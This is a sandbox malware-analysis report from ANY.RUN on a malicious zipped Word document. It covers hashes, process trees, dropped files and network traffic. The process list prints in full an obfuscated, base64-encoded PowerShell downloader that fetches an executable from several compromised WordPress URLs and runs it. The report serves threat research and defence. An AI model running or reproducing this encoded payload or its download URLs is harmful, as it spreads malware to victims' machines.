File name:

VRSYI9402361276VQ.doc.zip

Full analysis: https://app.any.run/tasks/40251457-52c6-4818-87b0-ede9d677b740
Verdict: Malicious activity
Analysis date: August 05, 2024, 11:59:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
susp-powershell
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
MD5:

E39466DF9F772E300BD09A0C69007C5E

SHA1:

D81D212FA9BF47E06BF3930E97EF2C904EE33253

SHA256:

03AF2088E35EA2607AF5594E0215C117F5B94526E2F7EA1FEF5460DFE665311D

SSDEEP:

3072:T1imcx9CoM462Rgz+BDbGnqTPIcTuHC+Tn:T1ixtY+6OPIt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • WINWORD.EXE (PID: 3024)

  • SUSPICIOUS

    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 3024)

    • Executed via WMI

      • powershell.exe (PID: 3192)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 3192)

    • Reads the Internet Settings

      • powershell.exe (PID: 3192)

  • INFO

    • Reads mouse settings

      • WINWORD.EXE (PID: 3024)

    • Manual execution by a user

      • WINWORD.EXE (PID: 3024)
      • explorer.exe (PID: 3440)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 3192)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3192)

    • Found Base64 encoded network access via PowerShell (YARA)

      • powershell.exe (PID: 3192)
      • WINWORD.EXE (PID: 3024)

    • Disables trace logs

      • powershell.exe (PID: 3192)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 3192)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 3192)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 51
ZipBitFlag: 0x0009
ZipCompression: Unknown (99)
ZipModifyDate: 2024:08:05 11:39:52
ZipCRC: 0x8f40b69f
ZipCompressedSize: 62175
ZipUncompressedSize: 173974
ZipFileName: VRSYI9402361276VQ.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
4
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winrar.exe no specs explorer.exe no specs THREAT winword.exe no specs THREAT powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1748"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Downloads\VRSYI9402361276VQ.doc.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3024"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\VRSYI9402361276VQ.doc\VRSYI9402361276VQ.doc"C:\Program Files\microsoft office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
3192powershell -encod JABFAF8AOQBqAGEAcwBoAD0AKAAnAEcAJwArACcANwAnACsAKAAnADMAYwB6ADYAJwArACcAOAAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBTAGUAcgBQAFIAbwBmAGkATABFAFwARgBzAFoANQBlADIAVwBcAFoAVgBGADcAaQB6AE8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIARQBDAHQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAUgBJAGAAVABZAHAAYABSAG8AYABUAE8AQwBvAGwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACsAKAAnACwAIAAnACsAJwB0ACcAKQArACgAJwBsAHMAJwArACcAMQAxACcAKQArACgAJwAsACAAdABsACcAKwAnAHMAJwApACkAOwAkAE4AMwA3AHAAdQA3AGYAIAA9ACAAKAAnAFcAYQAnACsAKAAnAHEAJwArACcAaQBoAG8AJwApACsAJwBrADcAJwApADsAJABGADUAaABnADYANQA1AD0AKAAoACcAVQBpAHUAMAAnACsAJwA4ACcAKQArACcAZQAxACcAKQA7ACQAUQBmAGgANQAzAGwAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAfQBGACcAKwAnAHMAJwArACgAJwB6ADUAZQAnACsAJwAyACcAKQArACcAdwB7ADAAfQBaACcAKwAnAHYAZgA3AGkAegBvAHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABOADMANwBwAHUANwBmACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQAVgB2AGoAMAB0AGsAZgA9ACgAKAAnAE4AYQAnACsAJwBoAGoAZgAnACkAKwAnADcAMwAnACkAOwAkAFoAbwBvAHUAcABpAG0APQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQBUAC4AVwBlAEIAQwBMAGkARQBuAFQAOwAkAEUAMAA4AGwANgB2AGsAPQAoACgAJwBoAHQAJwArACcAdABwADoAJwApACsAKAAnAC8ALwAnACsAJwBnACcAKQArACcAZQBlACcAKwAoACcAdgAnACsAJwBpAGQAJwApACsAKAAnAGEALgBjAG8AbQAvACcAKwAnAHcAJwApACsAKAAnAHAAJwArACcALQBhAGQAJwApACsAKAAnAG0AaQAnACsAJwBuAC8AJwApACsAKAAnAEQAaAAnACsAJwBXAG8AJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcAA6AC8AJwArACcALwBlACcAKQArACcAbAAnACsAKAAnAHIAbwAnACsAJwBmAGEAbgBmAG8AbwBkAHMAJwArACcALgAnACkAKwAoACcAYwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQAnACkAKwAoACcAZAAnACsAJwBtACcAKwAnAGkAbgAvAHEAYwAnACkAKwAnAC8AJwArACcAKgBoACcAKwAnAHQAJwArACcAdAAnACsAKAAnAHAAcwA6AC8ALwAnACsAJwB2AG8AbABjACcAKQArACgAJwBhACcAKwAnAG4AaQAnACkAKwAoACcAYwB0ACcAKwAnAC4AYwBvACcAKQArACgAJwBtACcAKwAnAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AaQBuAC8AJwArACcATABmAFcARgAnACkAKwAoACcARgAnACsAJwAvACoAaAB0AHQAJwArACcAcAA6AC8ALwB4ACcAKwAnAG0AagBhACcAKwAnAGQAZQB2AGUAcgAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAvAHcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAJwArACcAbgAvAEYAJwApACsAJwBUAE8AJwArACgAJwBYAEkAJwArACcALwAqAGgAdAB0AHAAJwApACsAJwBzACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AJwArACcAZwBiAG0AYwAnACsAJwBsACcAKQArACgAJwBlACcAKwAnAGEAbgAnACkAKwAoACcAaQBuAGcAJwArACcALgBjAG8AJwArACcAbQAnACsAJwAvADEAJwArACcALwBHACcAKwAnAGQAawAnACsAJwA1AGUAcQB2AC8AKgBoACcAKQArACgAJwB0AHQAJwArACcAcABzADoAJwApACsAJwAvACcAKwAnAC8AawAnACsAJwBpAG4AJwArACgAJwBnAGMAaAAnACsAJwB1ACcAKQArACcAZQBuACcAKwAoACcALgBjAG8AbQAvAGMAJwArACcAZwBpAC0AJwApACsAJwBiAGkAJwArACcAbgAvACcAKwAoACcASwAnACsAJwBRAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBiACcAKQArACcAaQAnACsAKAAnAGwAbABjADQANgAnACsAJwAuACcAKwAnAGMAbwBtAC8AJwArACcAdQBmADYAJwApACsAKAAnADUALwAnACsAJwBIADQAJwApACsAJwAvACcAKQAuACIAcwBQAEwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABCAHoAMwB6AGEAegBvAD0AKAAnAFkAeQAnACsAKAAnADcAdwAnACsAJwBtACcAKQArACcAeQA5ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AYQBmAHkAMQA4AGgAIABpAG4AIAAkAEUAMAA4AGwANgB2AGsAKQB7AHQAcgB5AHsAJABaAG8AbwB1AHAAaQBtAC4AIgBkAGAATwB3AE4AYABMAE8AYABBAGQARgBpAGwAZQAiACgAJABNAGEAZgB5ADEAOABoACwAIAAkAFEAZgBoADUAMwBsADEAKQA7ACQAUwA5AG4ANQBhADgAYQA9ACgAKAAnAFIAJwArACcAdAB4ADUAJwApACsAKAAnAHcAJwArACcAdQBpACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAFEAZgBoADUAMwBsADEAKQAuACIAbABgAEUAbgBHAFQAaAAiACAALQBnAGUAIAAzADgAMwA1ADQAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQBJACcAKwAnAHQAZQBtACcAKQAoACQAUQBmAGgANQAzAGwAMQApADsAJABXADgAaABtAGEAagBmAD0AKAAoACcARgBhADYAJwArACcAbwB0AGwAJwApACsAJwA3ACcAKQA7AGIAcgBlAGEAawA7ACQASAB1AGgAdAAwAHoAZgA9ACgAKAAnAFYAJwArACcAYQBzAGIAJwApACsAJwB1AHEAJwArACcAbwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAZwByADIAMgB2AHoAPQAoACgAJwBGACcAKwAnAHgAJwArACcANAA4AGYAdAAnACkAKwAnAGcAJwApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3440"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events
23 057
Read events
21 939
Write events
757
Delete events
361

Modification events

(PID) Process:(1748) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(1748) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(1748) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(1748) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(1748) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(1748) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(1748) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Downloads\VRSYI9402361276VQ.doc.zip
(PID) Process:(1748) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(1748) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(1748) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
1
Suspicious files
8
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
3024WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRCCAA.tmp.cvr
MD5:
SHA256:
3192powershell.exeC:\Users\admin\AppData\Local\Temp\pqzjf05j.y5z.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3192powershell.exeC:\Users\admin\FsZ5e2W\ZVF7izO\Waqihok7.exehtml
MD5:9EE2D6BEEE6F000ED7A51F8E23CB4C2D
SHA256:6700288B2C59162F7C8318A52EA0A44BAFB66169A89B72D09600E4E18986F19F
3192powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
1748WinRAR.exeC:\Users\admin\Downloads\VRSYI9402361276VQ.doc\VRSYI9402361276VQ.docdocument
MD5:9D67D115BD9E41189DF603B292936BE6
SHA256:9A9B641CD2AA314DD6CD3BAD0EFE8626D7A02AF15818B4470F68C984224A1034
3024WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\VRSYI9402361276VQ.doc.LNKbinary
MD5:AF9726EF064DA9EA6D240E0E26EB0DA4
SHA256:FC82A814578B778C80DFED1A2E3D5DFD3FDB0A4B67E86B541E6A438903146D94
3192powershell.exeC:\Users\admin\AppData\Local\Temp\ikgitxps.d0x.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3024WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:56E69990147DA650E8AD79E2A6871229
SHA256:34255C6F18D3148AF0C8513DB929E7A3FA80CB8852E8FCF1674E7B384B9AA960
3024WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:55B8419839EC71EFAD449A7BD8754E7F
SHA256:F8BB80500485CA32263C4841DCBEFBFED659BD39051EF5460FC8A599A3E7BF95
3024WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdbinary
MD5:2BE466BBF662D4462003DF352752C068
SHA256:62E93E44A080304A97E2C7C377B66A45C4B417CE8CAC0FECFE24A0D200ABB8FE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
14
DNS requests
13
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1372
svchost.exe
GET
304
199.232.214.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?33775f6043c93e33
unknown
whitelisted
1372
svchost.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1060
svchost.exe
GET
304
2.16.100.168:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a9f83325acc8ca75
unknown
whitelisted
1372
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3192
powershell.exe
GET
301
160.181.177.108:80
http://xmjadever.com/wp-admin/FTOXI/
unknown
suspicious
3192
powershell.exe
GET
200
104.26.9.151:80
http://geevida.com/wp-admin/DhWo/
unknown
whitelisted
3192
powershell.exe
GET
160.181.177.108:80
http://www.xmjadever.com/wp-admin/FTOXI/
unknown
suspicious
3192
powershell.exe
GET
160.181.177.108:80
http://www.xmjadever.com/wp-admin/FTOXI/
unknown
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1372
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
224.0.0.252:5355
whitelisted
1060
svchost.exe
224.0.0.252:5355
whitelisted
1372
svchost.exe
199.232.214.172:80
ctldl.windowsupdate.com
FASTLY
US
unknown
1372
svchost.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
1372
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1060
svchost.exe
2.16.100.168:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
whitelisted
3192
powershell.exe
104.26.9.151:80
geevida.com
CLOUDFLARENET
US
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.174
whitelisted
ctldl.windowsupdate.com
  • 199.232.214.172
  • 199.232.210.172
  • 2.16.100.168
  • 88.221.110.91
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
geevida.com
  • 104.26.9.151
  • 104.26.8.151
  • 172.67.69.98
unknown
elrofanfoods.com
unknown
volcanict.com
malicious
xmjadever.com
  • 160.181.177.108
unknown
www.xmjadever.com
  • 160.181.177.108
unknown
gbmcleaning.com
unknown

Threats

PID
Process
Class
Message
3192
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 25
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
VRSYI9402361276VQ.doc.zip